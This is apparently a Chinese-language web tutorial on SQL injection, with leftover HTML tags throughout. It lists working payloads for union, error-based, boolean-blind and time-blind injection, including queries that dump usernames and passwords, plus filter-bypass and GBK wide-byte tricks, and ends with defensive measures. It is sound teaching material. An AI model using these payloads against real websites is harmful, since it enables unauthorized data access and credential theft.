SQL注入攻击全面解析与防御指南<\/h1>

1. SQL注入概述<\/h2>
SQL注入(SQL Injection)是一种常见的Web安全漏洞，主要原因是Web应用程序在接收数据参数时未做好过滤，直接将用户输入带入数据库查询，导致攻击者可以构造并执行恶意SQL语句。<\/p>
SQL(结构化查询语言)是关系型数据库的标准编程语言，用于存取数据以及查询、更新、删除和管理关系型数据库。<\/p>

2. SQL注入类型与攻击技术<\/h2>

2.1 联合查询注入(Union注入)<\/h3>
?<\/span>id=-<\/span>1<\/span>' union select 1,(select database()),'<\/span>3<\/span>' limit 0,1
<\/span><\/span><\/span><\/code><\/pre>关键点：<\/strong><\/p>

使用-1<\/code>确保第一个SELECT无结果，使第二个SELECT结果能显示<\/li>
union select<\/code>合并查询结果<\/li>
limit 0,1<\/code>限制返回结果数量<\/li>
<\/ul>
信息收集步骤：<\/strong><\/p>

获取所有数据库：
?<\/span>id=-<\/span>1<\/span>' union select 1,(select group_concat(schema_name) from information_schema.schemata),'<\/span>3<\/span>
<\/span><\/span><\/code><\/pre><\/li>
查看特定数据库的表：
?<\/span>id=-<\/span>1<\/span>' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='<\/span>security<\/span>'),'<\/span>3<\/span>
<\/span><\/span><\/code><\/pre><\/li>
查看表的所有列：
?<\/span>id=-<\/span>1<\/span>' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='<\/span>security<\/span>' and table_name='<\/span>users'),'<\/span>3<\/span>
<\/span><\/span><\/code><\/pre><\/li>
获取数据内容：
?<\/span>id=-<\/span>1<\/span>' union select 1,(select group_concat(username,0x3a,password) from users),'<\/span>3<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
2.2 报错注入<\/h3>
extractValue()报错注入<\/h4>
1<\/span>'||extractvalue(1,concat(0x7e,database()))||'<\/span>1<\/span>'='<\/span>1<\/span>
<\/span><\/span><\/code><\/pre>updatexml报错注入<\/h4>
updatexml(1<\/span>,concat(0<\/span>x7e,(select<\/span> database<\/span>())),1<\/span>)
<\/span><\/span><\/code><\/pre>floor报错注入<\/h4>
and<\/span> (select<\/span> 1<\/span> from<\/span> (select<\/span> count<\/span>(*<\/span>),concat((select<\/span> database<\/span>()),floor(rand(0<\/span>)*<\/span>2<\/span>))x from<\/span> information_schema.tables group<\/span> by<\/span> x)a)
<\/span><\/span><\/code><\/pre>关键函数：<\/strong><\/p>

rand()<\/code>: 随机返回0~1之间的小数<\/li>
floor()<\/code>: 小数向下取整数<\/li>
ceiling()<\/code>: 小数向上取整数<\/li>
concat_ws()<\/code>: 将括号内数据用第一个字段连接起来<\/li>
group_concat()<\/code>: 将多行结果合并为一行<\/li>
<\/ul>
2.3 布尔盲注<\/h3>
当页面没有报错回显，只有True\/False两种响应时使用。<\/p>
技术要点：<\/strong><\/p>

使用ascii()<\/code>函数将字符转换为ASCII码<\/li>
使用substr()<\/code>函数逐字符判断<\/li>
通过比较ASCII值范围确定字符<\/li>
<\/ul>
?<\/span>id=<\/span>1<\/span>' and ascii(substr('<\/span>语句<\/span>',1,1))>97 --+
<\/span><\/span><\/span><\/code><\/pre>ASCII表关键值：<\/strong><\/p>

0-31: 控制字符<\/li>
32: 空格<\/li>
48-57: 数字0-9<\/li>
65-90: 大写字母A-Z<\/li>
97-122: 小写字母a-z<\/li>
<\/ul>
2.4 时间盲注<\/h3>
当页面无报错、无回显、无真假值，只有正常页面响应时使用。<\/p>
关键函数：<\/strong><\/p>

sleep()<\/code>: 参数为休眠时长(秒)<\/li>
if(condition,true,false)<\/code>: 条件判断<\/li>
<\/ul>
1<\/span>' and if(ascii(substr((select database()),1,1))>100,sleep(0),sleep(3)) # 
<\/span><\/span><\/span><\/code><\/pre>3. SQL注入过滤绕过技术<\/h2>
3.1 注释符绕过<\/h3>
un\/**\/<\/span>ion
<\/span><\/span><\/code><\/pre>3.2 大小写绕过<\/h3>
uNion<\/span> seLect<\/span>
<\/span><\/span><\/code><\/pre>3.3 复写单词绕过<\/h3>
ununionion seleselectct
<\/span><\/span><\/code><\/pre>3.4 空格过滤绕过<\/h3>

用+<\/code>号代替空格<\/li>
使用报错注入(无空格)<\/li>
使用注释符\/**\/<\/code>代替空格<\/li>
<\/ul>
3.5 and和or过滤绕过<\/h3>

使用&&<\/code>代替and<\/code>(URL编码为%26%26<\/code>)<\/li>
使用||<\/code>代替or<\/code><\/li>
<\/ul>
3.6 宽字节注入绕过<\/h3>
前提：<\/strong> 数据库使用GBK编码<\/p>
原理：<\/strong> 利用GBK编码特性，使反斜杠\<\/code>与后续字符组合成有效汉字，从而绕过addslashes()<\/code>等转义函数。<\/p>
?<\/span>id=<\/span>1<\/span>%<\/span>df' and 1=1 --+
<\/span><\/span><\/span><\/code><\/pre>addslashes()<\/code>函数会在单引号前添加反斜杠，但在GBK编码中，%df'<\/code>会被识别为一个汉字，使单引号逃逸。<\/p>
4. 防御措施<\/h2>


参数化查询(预编译语句)<\/strong><\/p>

使用预处理语句绑定参数<\/li>
避免SQL语句拼接<\/li>
<\/ul>
<\/li>

输入验证与过滤<\/strong><\/p>

白名单验证输入格式<\/li>
对特殊字符进行转义<\/li>
<\/ul>
<\/li>

最小权限原则<\/strong><\/p>

数据库账户使用最小必要权限<\/li>
避免使用root或高权限账户<\/li>
<\/ul>
<\/li>

错误处理<\/strong><\/p>

自定义错误页面<\/li>
避免泄露数据库错误信息<\/li>
<\/ul>
<\/li>

安全编码实践<\/strong><\/p>

使用ORM框架<\/li>
定期安全审计<\/li>
使用Web应用防火墙(WAF)<\/li>
<\/ul>
<\/li>

编码设置<\/strong><\/p>

统一使用UTF-8编码<\/li>
避免宽字节注入漏洞<\/li>
<\/ul>
<\/li>
<\/ol>
通过全面理解SQL注入原理、攻击技术和防御措施，开发人员可以构建更安全的Web应用程序，有效防范此类安全威胁。<\/p>